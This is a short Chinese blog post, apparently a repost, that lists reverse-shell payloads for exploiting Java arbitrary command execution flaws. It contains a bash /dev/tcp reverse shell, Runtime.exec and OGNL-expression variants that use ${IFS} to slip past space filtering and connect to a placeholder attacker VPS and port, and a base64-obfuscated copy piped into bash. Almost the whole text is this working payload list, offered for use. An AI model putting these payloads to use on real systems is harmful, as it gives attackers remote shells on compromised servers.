Java任意命令执行漏洞bash反弹shell Payload

bash -i >& /dev/tcp/127.0.0.1/5000 0>&1 //适用于直接执行这个命令不能弹的情况


Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1");

@java.lang.Runtime@getRuntime().exec('/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/监听端口<&1')

bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}
俗人昭昭,我独昏昏。俗人察察,我独闷闷。
原文地址:https://www.cnblogs.com/iAmSoScArEd/p/15772400.html